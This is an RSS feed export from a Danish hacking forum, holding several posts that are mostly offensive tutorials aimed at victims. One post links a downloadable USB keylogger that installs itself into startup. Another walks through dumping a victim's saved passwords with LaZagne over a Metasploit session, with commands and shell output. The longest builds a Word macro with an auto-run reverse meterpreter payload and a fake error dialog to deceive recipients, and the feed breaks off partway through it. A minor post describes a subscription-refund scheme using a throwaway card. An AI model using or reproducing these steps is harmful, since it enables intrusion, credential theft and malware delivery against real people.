<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[Shellsec - Vejledninger]]></title>
		<link>https://www.shellsec.pw/</link>
		<description><![CDATA[Shellsec - https://www.shellsec.pw]]></description>
		<pubDate>Fri, 17 Apr 2026 06:52:26 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[My bad]]></title>
			<link>https://www.shellsec.pw/traad-my-bad</link>
			<pubDate>Sat, 18 May 2019 23:29:10 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-my-bad</guid>
			<description><![CDATA[Godt der bedre uddannede mennesker end mig herinde. Jeg tog fejl, hvilket ville have været ret tydeligt hvis jeg havde brugt bare 5 minutter på at undersøge det ordentligt.]]></description>
			<content:encoded><![CDATA[Godt der bedre uddannede mennesker end mig herinde. Jeg tog fejl, hvilket ville have været ret tydeligt hvis jeg havde brugt bare 5 minutter på at undersøge det ordentligt.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[!Free USB Keylogger!]]></title>
			<link>https://www.shellsec.pw/traad-free-usb-keylogger</link>
			<pubDate>Tue, 31 Oct 2017 10:00:03 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-free-usb-keylogger</guid>
			<description><![CDATA[!USB Keylogger!<br />
<br />
Hej bois, jeg faldt lige over den her tråd på hackforums omkring en meget sjov usb keylogger og tænkte jeg ville dele den med jer.<br />
Jeg er ikke sikker på om noget lignende ligger herinde, hvis det er tilfældet så vil jeg gerne slette tråden igen :) <br />
<br />
<br />
KLog (kræver fysisk adgang til systemet)<br />
<br />
Install.bat: smider Winhost.exe(Keyloggeren) i startup så den automatisk bliver eksekveret.<br />
<br />
Uninstall.bat: fjerner Winhost.exe processen og sletter den fra startup.<br />
Getlog.bat: smider logfilen fra computeren ind på usb stikket<br />
<br />
Clear.bat: rydder loggen på computeren(ikke på usb stikket)<br />
<br />
Install.bat lukker ikke cmd boksen automatisk, det skal gøres manuelt.<br />
Alle andre bat filer lukker selv når de er færdige <br />
<br />
<span style="font-weight: bold;" class="mycode_b">Jeg har ikke lavet den eller opslaget, jeg fandt den på Hackforums fra en gut ved navn Pronouncer så fuld kreds til ham. </span><br />
<span style="font-weight: bold;" class="mycode_b">har dog prøvet at oversætte den til dansk så godt jeg kunne. </span><br />
<br />
<br />
Link til KLog<br />
<div><div class="spoiler_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='(Click to View)';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='(Click to Hide)';}">(Click to View)</a></div><div class="spoiler_body" style="display: none;"><a href="https://mega.nz/#!URlViCLB!RwPPga7-wPRFlVXiEs2zGLYS6D_RkU1tPEJ_HgsDpaw" target="_blank" rel="noopener" class="mycode_url"><span style="color: #f9f9f9;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: -apple-system, BlinkMacSystemFont,;" class="mycode_font">https://mega.nz/#!URlViCLB!RwPPga7-wPRFl...EJ_HgsDpaw</span></span></span></a></div></div>]]></description>
			<content:encoded><![CDATA[!USB Keylogger!<br />
<br />
Hej bois, jeg faldt lige over den her tråd på hackforums omkring en meget sjov usb keylogger og tænkte jeg ville dele den med jer.<br />
Jeg er ikke sikker på om noget lignende ligger herinde, hvis det er tilfældet så vil jeg gerne slette tråden igen :) <br />
<br />
<br />
KLog (kræver fysisk adgang til systemet)<br />
<br />
Install.bat: smider Winhost.exe(Keyloggeren) i startup så den automatisk bliver eksekveret.<br />
<br />
Uninstall.bat: fjerner Winhost.exe processen og sletter den fra startup.<br />
Getlog.bat: smider logfilen fra computeren ind på usb stikket<br />
<br />
Clear.bat: rydder loggen på computeren(ikke på usb stikket)<br />
<br />
Install.bat lukker ikke cmd boksen automatisk, det skal gøres manuelt.<br />
Alle andre bat filer lukker selv når de er færdige <br />
<br />
<span style="font-weight: bold;" class="mycode_b">Jeg har ikke lavet den eller opslaget, jeg fandt den på Hackforums fra en gut ved navn Pronouncer så fuld kreds til ham. </span><br />
<span style="font-weight: bold;" class="mycode_b">har dog prøvet at oversætte den til dansk så godt jeg kunne. </span><br />
<br />
<br />
Link til KLog<br />
<div><div class="spoiler_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='(Click to View)';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='(Click to Hide)';}">(Click to View)</a></div><div class="spoiler_body" style="display: none;"><a href="https://mega.nz/#!URlViCLB!RwPPga7-wPRFlVXiEs2zGLYS6D_RkU1tPEJ_HgsDpaw" target="_blank" rel="noopener" class="mycode_url"><span style="color: #f9f9f9;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: -apple-system, BlinkMacSystemFont,;" class="mycode_font">https://mega.nz/#!URlViCLB!RwPPga7-wPRFl...EJ_HgsDpaw</span></span></span></a></div></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Android tablet for 50 kr.]]></title>
			<link>https://www.shellsec.pw/traad-android-tablet-for-50-kr</link>
			<pubDate>Fri, 07 Apr 2017 10:47:53 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-android-tablet-for-50-kr</guid>
			<description><![CDATA[<div style="text-align: left;" class="mycode_align">Modtag denne (eller lignende) <a href="http://www.everbuying.net/product787952.html" target="_blank" rel="noopener" class="mycode_url"><span style="color: #ff3333;" class="mycode_color">Android tablet</span></a> for 50 kr. inkl. fragt</div>
<br />
<div style="text-align: left;" class="mycode_align">1. Gå ind på <a href="https://dk.quizonaut.com/campaigns/build/?id=8C2A4FF5-2784-4CCC-950D-EC77CB18EB48" target="_blank" rel="noopener" class="mycode_url"><span style="color: #ff3333;" class="mycode_color">Quizonaut</span></a> med Tor browser (der er problemer med Google Chrome)</div>
<br />
<div style="text-align: left;" class="mycode_align">2. Indtast dine kreditkortoplysninger (brug for guds skyld ikke dit rigtige, men noget i stil med <a href="https://cryptopay.me/join/2bcc1784" target="_blank" rel="noopener" class="mycode_url"><span style="color: #ff3333;" class="mycode_color">cryptopay</span></a>,  (ref) så selv hvis du glemmer at afmelde dig kan de ikke trække flere penge  <img src="https://www.shellsec.pw/images/smilies/facebook/pacman.png" alt="Pacman" title="Pacman" class="smilie smilie_83" /> )</div>
<br />
<div style="text-align: left;" class="mycode_align">3. Du modtager en email, hvori du får din ordre bekræftet. <img src="http://i.imgur.com/t4r0xzJ.png" alt="[Billede: t4r0xzJ.png]" class="mycode_img" /></div>
<br />
<div style="text-align: left;" class="mycode_align">4. Vent et par dage og afmeld dig via support@quizonaut.com</div>
<br />
5. Skriv et professionelt afmeldelsesbrev f.eks.:<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Hi Quizoaut <br />
<br />
I would like to cancel my subscription i have with you. I signed up the xxxxx with the email xxxx - According to EU law i would still like to receive my tablet, which you promised me when i signed up. I have paid you 50 DKK, and i would like you not to withdraw anymore funds from my credit card, unless i am to sign up to your service again.<br />
<br />
Best regards<br />
xxx</blockquote>
<br />
<br />
6. Du bliver herefter videresendt via mail til en hjemmeside, som hedder giftcable.com<br />
<br />
7. De vil bede om bevis på at det er dig. Jeg sendte et billede af pas med alle sensitive informationer fjernet. Du kan også prøve at nægte og true dem med anmeldelse, da det jo ikke er normal procedure. Brug evt. dette <a href="https://ec.europa.eu/digital-single-market/en/code-eu-online-rights" target="_blank" rel="noopener" class="mycode_url"><span style="color: #ff3333;" class="mycode_color">EU link</span></a>, da det skræmmer dem at du ved hvad du siger og har belæg for det.<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Chapter 8: Protection against unfair practices38<br />
<br />
(1) Any consumer, including the digital consumer, has the right either to complain to the national enforcement authorities39 or to take legal action against a trader in the EU that uses unfair commercial practices. For example, after making an online purchase, consumers cannot be made subject to onerous or disproportionate non-contractual obstacles (such as filling in a large amount of forms or being asked to call a specific phone number when no one is answering the call) in order to prevent them from terminating the contract or switching to another product or trader.40</blockquote>
<br />
8. Giftcable vil nu prøve at stalle dig til at give op. Vær nærgående og nævn så tit du kan at de ifølge lovgivningen skal sende dig tabletten. <br />
<br />
9. Grin over deres latterlige fremgangsmåde:<br />
<img src="http://i.imgur.com/TJ7THXb.png" alt="[Billede: TJ7THXb.png]" class="mycode_img" /><br />
<br />
10. Modtag tabletten, brick den og start forfra igen... <img src="https://www.shellsec.pw/images/smilies/facebook/kawaii_sad.png" alt="Kawaii_sad" title="Kawaii_sad" class="smilie smilie_70" /><br />
<br />
<br />
<br />
- Det tog længere tid end jeg regnede med at skrive. Jeg håber i kommer til at nyde jeres tablets  og skriv endelig, hvis i løber ind i problemer. <img src="https://www.shellsec.pw/images/smilies/facebook/love.png" alt="Love" title="Love" class="smilie smilie_73" />]]></description>
			<content:encoded><![CDATA[<div style="text-align: left;" class="mycode_align">Modtag denne (eller lignende) <a href="http://www.everbuying.net/product787952.html" target="_blank" rel="noopener" class="mycode_url"><span style="color: #ff3333;" class="mycode_color">Android tablet</span></a> for 50 kr. inkl. fragt</div>
<br />
<div style="text-align: left;" class="mycode_align">1. Gå ind på <a href="https://dk.quizonaut.com/campaigns/build/?id=8C2A4FF5-2784-4CCC-950D-EC77CB18EB48" target="_blank" rel="noopener" class="mycode_url"><span style="color: #ff3333;" class="mycode_color">Quizonaut</span></a> med Tor browser (der er problemer med Google Chrome)</div>
<br />
<div style="text-align: left;" class="mycode_align">2. Indtast dine kreditkortoplysninger (brug for guds skyld ikke dit rigtige, men noget i stil med <a href="https://cryptopay.me/join/2bcc1784" target="_blank" rel="noopener" class="mycode_url"><span style="color: #ff3333;" class="mycode_color">cryptopay</span></a>,  (ref) så selv hvis du glemmer at afmelde dig kan de ikke trække flere penge  <img src="https://www.shellsec.pw/images/smilies/facebook/pacman.png" alt="Pacman" title="Pacman" class="smilie smilie_83" /> )</div>
<br />
<div style="text-align: left;" class="mycode_align">3. Du modtager en email, hvori du får din ordre bekræftet. <img src="http://i.imgur.com/t4r0xzJ.png" alt="[Billede: t4r0xzJ.png]" class="mycode_img" /></div>
<br />
<div style="text-align: left;" class="mycode_align">4. Vent et par dage og afmeld dig via support@quizonaut.com</div>
<br />
5. Skriv et professionelt afmeldelsesbrev f.eks.:<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Hi Quizoaut <br />
<br />
I would like to cancel my subscription i have with you. I signed up the xxxxx with the email xxxx - According to EU law i would still like to receive my tablet, which you promised me when i signed up. I have paid you 50 DKK, and i would like you not to withdraw anymore funds from my credit card, unless i am to sign up to your service again.<br />
<br />
Best regards<br />
xxx</blockquote>
<br />
<br />
6. Du bliver herefter videresendt via mail til en hjemmeside, som hedder giftcable.com<br />
<br />
7. De vil bede om bevis på at det er dig. Jeg sendte et billede af pas med alle sensitive informationer fjernet. Du kan også prøve at nægte og true dem med anmeldelse, da det jo ikke er normal procedure. Brug evt. dette <a href="https://ec.europa.eu/digital-single-market/en/code-eu-online-rights" target="_blank" rel="noopener" class="mycode_url"><span style="color: #ff3333;" class="mycode_color">EU link</span></a>, da det skræmmer dem at du ved hvad du siger og har belæg for det.<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Chapter 8: Protection against unfair practices38<br />
<br />
(1) Any consumer, including the digital consumer, has the right either to complain to the national enforcement authorities39 or to take legal action against a trader in the EU that uses unfair commercial practices. For example, after making an online purchase, consumers cannot be made subject to onerous or disproportionate non-contractual obstacles (such as filling in a large amount of forms or being asked to call a specific phone number when no one is answering the call) in order to prevent them from terminating the contract or switching to another product or trader.40</blockquote>
<br />
8. Giftcable vil nu prøve at stalle dig til at give op. Vær nærgående og nævn så tit du kan at de ifølge lovgivningen skal sende dig tabletten. <br />
<br />
9. Grin over deres latterlige fremgangsmåde:<br />
<img src="http://i.imgur.com/TJ7THXb.png" alt="[Billede: TJ7THXb.png]" class="mycode_img" /><br />
<br />
10. Modtag tabletten, brick den og start forfra igen... <img src="https://www.shellsec.pw/images/smilies/facebook/kawaii_sad.png" alt="Kawaii_sad" title="Kawaii_sad" class="smilie smilie_70" /><br />
<br />
<br />
<br />
- Det tog længere tid end jeg regnede med at skrive. Jeg håber i kommer til at nyde jeres tablets  og skriv endelig, hvis i løber ind i problemer. <img src="https://www.shellsec.pw/images/smilies/facebook/love.png" alt="Love" title="Love" class="smilie smilie_73" />]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[TUTORIAL] Hack alle passwords - Shell]]></title>
			<link>https://www.shellsec.pw/traad-tutorial-hack-alle-passwords-shell</link>
			<pubDate>Thu, 09 Mar 2017 14:35:38 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-tutorial-hack-alle-passwords-shell</guid>
			<description><![CDATA[Jeg håber I nyder nr. 2 Tutorial fra mig :)<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-size: large;" class="mycode_size"><span style="font-size: x-large;" class="mycode_size"><span style="font-family: Impact;" class="mycode_font">Beskrivelse:</span></span></span></span><br />
I den følgende Tutorial, vil du komme til at arbejde med Shell Console, Metasploit og LaZagne.<br />
Formålet er, at skaffe alle ofrets gemte kodeord.<br />
Du kan se en liste over, hvilke slags passwords, du kan hacke.<br />
<img src="https://github.com/AlessandroZ/LaZagne/raw/master/pictures/softwares.png" alt="[Billede: softwares.png]" class="mycode_img" /><br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-size: x-large;" class="mycode_size"><span style="font-family: Impact;" class="mycode_font">Hvad du skal bruge:</span></span></span><ul class="mycode_list"><li><span style="font-weight: bold;" class="mycode_b">Kali Linux</span><br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Metasploit</span><br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Basic viden om Kali Linux</span><br />
</li>
<li>Hjerne<br />
</li>
</ul>
<span style="font-size: x-large;" class="mycode_size"><span style="font-family: Impact;" class="mycode_font">Hvem er dette attack målrettet i mod?:</span></span><ul class="mycode_list"><li>Alle der infectet af en metasploit exploit.<br />
</li>
</ul>
<span style="font-size: x-large;" class="mycode_size"><span style="font-family: Impact;" class="mycode_font">Download links:</span></span><ul class="mycode_list"><li><a href="https://github.com/AlessandroZ/LaZagne/releases/" target="_blank" rel="noopener" class="mycode_url">https://github.com/AlessandroZ/LaZagne/releases/</a><br />
</li>
</ul>
<span style="font-family: Impact;" class="mycode_font"><span style="font-size: x-large;" class="mycode_size"><span style="color: #3399cc;" class="mycode_color">Tutorial:</span></span></span><br />
<ol type="1" class="mycode_list"><li>Download LaZagne ved at skrive <span style="font-style: italic;" class="mycode_i">wget <a href="https://github.com/AlessandroZ/LaZagne/releases/download/2.0/Windows.zip" target="_blank" rel="noopener" class="mycode_url">https://github.com/AlessandroZ/LaZagne/r...indows.zip</a></span><br />
</li>
<li>Unzip filen ved, at skrive <span style="font-style: italic;" class="mycode_i">unzip Windows.zip</span>.<br />
</li>
<li>Skaf en metasploit session til ofret. Du kan søge online efter det, eller bruge min metode, som beskrevet <a href="https://www.shellsec.pw/traad-microsoft-word-macro-powershell" target="_blank" rel="noopener" class="mycode_url">her</a><br />
</li>
<li>Select dit offer. Skriv <span style="font-style: italic;" class="mycode_i">sessions </span>for, at se hvilket session ID ofret har. Herefter skriver du <span style="font-style: italic;" class="mycode_i">sessions -i &lt;id&gt;</span>. I mit tilfælde <span style="font-style: italic;" class="mycode_i">sessions -i 1</span><br />
</li>
<li>Nu skriver du <span style="font-style: italic;" class="mycode_i">cd temp</span> for, at komme ind i temp mappen, på ofrets computer.<br />
</li>
<li>Upload nu LaZagne til ofrets temp mappe. Skriv <span style="font-style: italic;" class="mycode_i">upload &lt;der hvor du har gemt LaZagne&gt;,</span> i mit tilfælde <span style="font-style: italic;" class="mycode_i">upload '/root/unicorn/Windows/laZagne.exe' .</span><br />
</li>
<li>Nu skal du oprette shell adgang, til computeren. Det gør du ved at skrive <span style="font-style: italic;" class="mycode_i">shell</span>.<br />
</li>
<li>Nu kan du se, at du er inde i temp mappen<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>meterpreter &gt; shell<br />
Process 12260 created.<br />
Channel 3 created.<br />
Microsoft Windows [Version 10.0.14393]<br />
(c) 2016 Microsoft Corporation. Alle rettigheder forbeholdes.<br />
C:&#92;Users&#92;XXXXXX&#92;AppData&#92;Local&#92;Temp&gt;</code></div></div><br />
</li>
<li>Skriv nu herefter følgende <span style="font-style: italic;" class="mycode_i">laZagne.exe all</span><br />
</li>
<li>Nu har du fået en liste, med alle de gemte kodeord på ofrets computer.<br />
<img src="https://cdn.pbrd.co/images/4kOerqtl4.png" alt="[Billede: 4kOerqtl4.png]" class="mycode_img" /><br />
</li>
</ol>
<span style="color: #3399ff;" class="mycode_color"><span style="font-size: large;" class="mycode_size"><span style="font-family: Verdana, Arial, sans-serif;" class="mycode_font">Er der noget jeg kan gøre bedre, vil jeg også meget gerne vide det - har du brug for hjælp til noget, eller har du nogle spørgsmål, så er du velkommen til at poste det i kommentar.</span></span></span><br />
<br />
Jeg valgte at lave denne tutorial, fordi folk spurgte mig i min tråd og i PM, hvordan man gjorde :) Jeg håber I kunne bruge min nummer 2 tutorial - det er altid en fornøjelse, at lave en tutorial for jer - jeg elsker jeres feedback.<br />
<br />
 - TheHacker, ude <img src="https://www.shellsec.pw/images/smilies/facebook/love.png" alt="Love" title="Love" class="smilie smilie_73" />]]></description>
			<content:encoded><![CDATA[Jeg håber I nyder nr. 2 Tutorial fra mig :)<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-size: large;" class="mycode_size"><span style="font-size: x-large;" class="mycode_size"><span style="font-family: Impact;" class="mycode_font">Beskrivelse:</span></span></span></span><br />
I den følgende Tutorial, vil du komme til at arbejde med Shell Console, Metasploit og LaZagne.<br />
Formålet er, at skaffe alle ofrets gemte kodeord.<br />
Du kan se en liste over, hvilke slags passwords, du kan hacke.<br />
<img src="https://github.com/AlessandroZ/LaZagne/raw/master/pictures/softwares.png" alt="[Billede: softwares.png]" class="mycode_img" /><br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-size: x-large;" class="mycode_size"><span style="font-family: Impact;" class="mycode_font">Hvad du skal bruge:</span></span></span><ul class="mycode_list"><li><span style="font-weight: bold;" class="mycode_b">Kali Linux</span><br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Metasploit</span><br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Basic viden om Kali Linux</span><br />
</li>
<li>Hjerne<br />
</li>
</ul>
<span style="font-size: x-large;" class="mycode_size"><span style="font-family: Impact;" class="mycode_font">Hvem er dette attack målrettet i mod?:</span></span><ul class="mycode_list"><li>Alle der infectet af en metasploit exploit.<br />
</li>
</ul>
<span style="font-size: x-large;" class="mycode_size"><span style="font-family: Impact;" class="mycode_font">Download links:</span></span><ul class="mycode_list"><li><a href="https://github.com/AlessandroZ/LaZagne/releases/" target="_blank" rel="noopener" class="mycode_url">https://github.com/AlessandroZ/LaZagne/releases/</a><br />
</li>
</ul>
<span style="font-family: Impact;" class="mycode_font"><span style="font-size: x-large;" class="mycode_size"><span style="color: #3399cc;" class="mycode_color">Tutorial:</span></span></span><br />
<ol type="1" class="mycode_list"><li>Download LaZagne ved at skrive <span style="font-style: italic;" class="mycode_i">wget <a href="https://github.com/AlessandroZ/LaZagne/releases/download/2.0/Windows.zip" target="_blank" rel="noopener" class="mycode_url">https://github.com/AlessandroZ/LaZagne/r...indows.zip</a></span><br />
</li>
<li>Unzip filen ved, at skrive <span style="font-style: italic;" class="mycode_i">unzip Windows.zip</span>.<br />
</li>
<li>Skaf en metasploit session til ofret. Du kan søge online efter det, eller bruge min metode, som beskrevet <a href="https://www.shellsec.pw/traad-microsoft-word-macro-powershell" target="_blank" rel="noopener" class="mycode_url">her</a><br />
</li>
<li>Select dit offer. Skriv <span style="font-style: italic;" class="mycode_i">sessions </span>for, at se hvilket session ID ofret har. Herefter skriver du <span style="font-style: italic;" class="mycode_i">sessions -i &lt;id&gt;</span>. I mit tilfælde <span style="font-style: italic;" class="mycode_i">sessions -i 1</span><br />
</li>
<li>Nu skriver du <span style="font-style: italic;" class="mycode_i">cd temp</span> for, at komme ind i temp mappen, på ofrets computer.<br />
</li>
<li>Upload nu LaZagne til ofrets temp mappe. Skriv <span style="font-style: italic;" class="mycode_i">upload &lt;der hvor du har gemt LaZagne&gt;,</span> i mit tilfælde <span style="font-style: italic;" class="mycode_i">upload '/root/unicorn/Windows/laZagne.exe' .</span><br />
</li>
<li>Nu skal du oprette shell adgang, til computeren. Det gør du ved at skrive <span style="font-style: italic;" class="mycode_i">shell</span>.<br />
</li>
<li>Nu kan du se, at du er inde i temp mappen<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>meterpreter &gt; shell<br />
Process 12260 created.<br />
Channel 3 created.<br />
Microsoft Windows [Version 10.0.14393]<br />
(c) 2016 Microsoft Corporation. Alle rettigheder forbeholdes.<br />
C:&#92;Users&#92;XXXXXX&#92;AppData&#92;Local&#92;Temp&gt;</code></div></div><br />
</li>
<li>Skriv nu herefter følgende <span style="font-style: italic;" class="mycode_i">laZagne.exe all</span><br />
</li>
<li>Nu har du fået en liste, med alle de gemte kodeord på ofrets computer.<br />
<img src="https://cdn.pbrd.co/images/4kOerqtl4.png" alt="[Billede: 4kOerqtl4.png]" class="mycode_img" /><br />
</li>
</ol>
<span style="color: #3399ff;" class="mycode_color"><span style="font-size: large;" class="mycode_size"><span style="font-family: Verdana, Arial, sans-serif;" class="mycode_font">Er der noget jeg kan gøre bedre, vil jeg også meget gerne vide det - har du brug for hjælp til noget, eller har du nogle spørgsmål, så er du velkommen til at poste det i kommentar.</span></span></span><br />
<br />
Jeg valgte at lave denne tutorial, fordi folk spurgte mig i min tråd og i PM, hvordan man gjorde :) Jeg håber I kunne bruge min nummer 2 tutorial - det er altid en fornøjelse, at lave en tutorial for jer - jeg elsker jeres feedback.<br />
<br />
 - TheHacker, ude <img src="https://www.shellsec.pw/images/smilies/facebook/love.png" alt="Love" title="Love" class="smilie smilie_73" />]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[TUTORIAL] Word RAT Macro - Powershell]]></title>
			<link>https://www.shellsec.pw/traad-tutorial-word-rat-macro-powershell</link>
			<pubDate>Wed, 01 Mar 2017 21:53:51 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-tutorial-word-rat-macro-powershell</guid>
			<description><![CDATA[Hehe... Så kom der en lille sjov tutorial...<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-size: large;" class="mycode_size"><span style="font-size: x-large;" class="mycode_size"><span style="font-family: Impact;" class="mycode_font">Beskrivelse:</span></span></span></span><br />
I den følgende Tutorial vil du komme til at arbejde med Word Macros (RATs). <br />
Denne metode vil give dig fuld adgang til ofrets computer. <br />
Den måde denne exploit fungere på er, at når en person åbner Word-filen du har sendt, så vil ofrets computer automatisk køre din fil.<br />
Denne metode er 95% FUD. Der er nogle få, der opdager denne RAT, men de færreste.<br />
Word dokumentet lukker med en fejl besked "The document appears to be made on an older version of Microsoft. <br />
Please have the creator save to a newer and supported format.", når det bliver åbnet. Dette kan dog laves om, hvis du vil.<br />
<br />
<br />
<img src="http://nodistribute.com/result/image/lpAJQ4aZhRC1cWrd9EeFDOq.png" alt="[Billede: lpAJQ4aZhRC1cWrd9EeFDOq.png]" class="mycode_img" /><br />
<br />
<br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-size: x-large;" class="mycode_size"><span style="font-family: Impact;" class="mycode_font">Hvad du skal bruge:</span></span></span><br />
<ul class="mycode_list"><li><span style="font-weight: bold;" class="mycode_b">Word 2016 (kan crackes, lidt ligegyldigt) eller hvilket som helst Microsoft Dokument fil</span><br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Kali Linux (hvis det er vmware/virtuelbox, så skal den være bridged)</span><br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Metasploit basic viden</span><br />
</li>
<li>Hjerne<br />
</li>
<li>Viden<br />
</li>
</ul>
<span style="font-size: x-large;" class="mycode_size"><span style="font-family: Impact;" class="mycode_font">Hvem er dette attack målrettet i mod?:</span></span><ul class="mycode_list"><li>Hovedsageligt kontor brugere, elever, skoler, lærere<br />
</li>
<li>Word brugere<br />
</li>
</ul>
<span style="font-size: x-large;" class="mycode_size"><span style="font-family: Impact;" class="mycode_font">Download links:</span></span><ul class="mycode_list"><li><a href="https://github.com/trustedsec/unicorn" target="_blank" rel="noopener" class="mycode_url">https://github.com/trustedsec/unicorn</a><br />
</li>
</ul>
<span style="font-family: Impact;" class="mycode_font"><span style="font-size: x-large;" class="mycode_size"><span style="color: #3399cc;" class="mycode_color">Tutorial:</span></span></span><br />
<ol type="1" class="mycode_list"><li>Tænd din kali linux<br />
</li>
<li>Skriv <span style="font-style: italic;" class="mycode_i">apt-get install git</span>, dette vil installere git, som bla. kan bruges til at hente github repositories<br />
</li>
<li>Skriv <span style="font-style: italic;" class="mycode_i">apt-get install python</span>, for at installere python<br />
</li>
<li>Herefter skal du hente unicorn, det gør du ved at skrive <span style="font-style: italic;" class="mycode_i">git clone <a href="https://github.com/trustedsec/unicorn.git" target="_blank" rel="noopener" class="mycode_url">https://github.com/trustedsec/unicorn.git</a></span><br />
</li>
<li>Nu skal vi ind hvor unicorn er blevet hentet. Det gør du ved at skrive <span style="font-style: italic;" class="mycode_i">cd unicorn</span><br />
</li>
<li>Nu kan du skrive <span style="font-style: italic;" class="mycode_i">python unicorn.py</span> ved, at skrive dette kan du, se hvad du kan bruge scriptet til.<br />
</li>
<li>Du skal nu finde din IP på sider som <a href="https://www.whatismyip.com/" target="_blank" rel="noopener" class="mycode_url">whatismyip</a>, <a href="http://canyouseeme.org/" target="_blank" rel="noopener" class="mycode_url">canyouseeme </a>og eller hvilken som helst anden. Søg blot efter "find my ip" på google.<br />
Jeg anbefaler dog <a href="http://canyouseeme.org/" target="_blank" rel="noopener" class="mycode_url">canyouseeme</a>, da vi kommer til at bruge den senere.<br />
Nu skal du sørge for at din port er portforwarded (håber jeg, du ved hvordan)<br />
</li>
<li>Skriv nu <span style="font-style: italic;" class="mycode_i">python unicorn.py windows/meterpreter/reverse_tcp &lt;din ip&gt; &lt;din valgte port&gt; macro<br />
</span>Du kan nok genkende windows/meterpreter/reverse_tcp fra metasploit.<br />
</li>
<li>Nu opretter den en fil "powershell_attack.txt" her i ligger din macro kode. Den kommer vi til at bruge senere.<br />
</li>
<li>Du kan se, du kan bruge <span style="font-style: italic;" class="mycode_i">msfconsole -r unicorn.rc </span>for at den automatisk kører din payload i metasploit, dog skal vi lige ændre noget.<br />
Skriv <span style="font-style: italic;" class="mycode_i">leafpad unicorn.rc</span> og ændre LHOST til din inet adresse. Denne kan findes ved at skrive <span style="font-style: italic;" class="mycode_i">ifconfig </span>i terminalen. <br />
Grunden til, at vi gør det, er så vi kan listen scriptet på din computer. Du kan ikke bruge den optimalt, hvis du ikke ændre det, <br />
fordi den forsøger at forbinde til din ip, i stedet for din inet adresse.<br />
Jeg har lige opdaget, at den nye version af unicorn har en fejl, der gør, at du også skal ændre LPORT. <br />
LPORT skal ændres til den port, du har portforwarded.<br />
</li>
<li>Åben nu word på din egen computer og opret et dokument,<br />
</li>
<li>Kopier indeholdet fra powershell_attack.txt (leafpad powershell_attack.txt)<br />
</li>
<li>Gå nu ind til dit word dokument igen og tryk under Makroer i: "Dokument (dokument)"--&gt; Herefter Vis --&gt; Makroer --&gt; Opret --&gt; Under Project (Dok1) vælger du "ThisDocument" --&gt; sæt herefter hele powershell scriptet ind.<br />
</li>
<li>Ændre<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite> Sub <span style="color: #ff3333;" class="mycode_color">Auto_Open</span>()<br />
Dim gEmssmj</blockquote>
<br />
til AutoOpen, det vil sige uden _<br />
</li>
<li>Herefter ændre i det, som du vil. Du kan f.eks. fjerne<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Dim title As String<br />
title = "Microsoft Corrupt Document"<br />
Dim msg As String<br />
Dim intResponse As Integer<br />
msg = "The document appears to be made on an older version of Microsoft. <br />
Please have the creator save to a newer and supported format."<br />
intResponse = MsgBox(msg, 16, title)<br />
Application.Quit</blockquote>
 <br />
fra scriptet for at undgå den lukker. Du kan også ændre teksten af fejlbeskeden, hvis du vil.<br />
</li>
<li>Nu kan du vælge at skrive noget i word dokumentet, hvis du vil.<br />
</li>
<li>Vi skal nu gemme word dokumentet (på en speciel måde), gå ind under Filer --&gt; Gem som --&gt;  Gennemse (og vælg, hvor du vil gemme den) --&gt; Under filtype vælger du "Word 97 - 2003-dokumenter (*.doc)"´<br />
</li>
<li>Tryk nu gem<br />
</li>
<li>Gå tilbage til din kali linux og kør <span style="font-style: italic;" class="mycode_i">msfconsole -r unicorn.rc </span>og vent på at den er færdig, hvor der står (<br />
</li>
<li>Starting the payload handler...).<br />
</li>
<li>Prøv nu at åbne dokumentet på din computer (det er sikkert, bare rolig) og se om du kan se noget i din terminal. Hvis du har gjort alt rigtigt, skal der gerne stå (Meterpreter session 1 opened )<br />
</li>
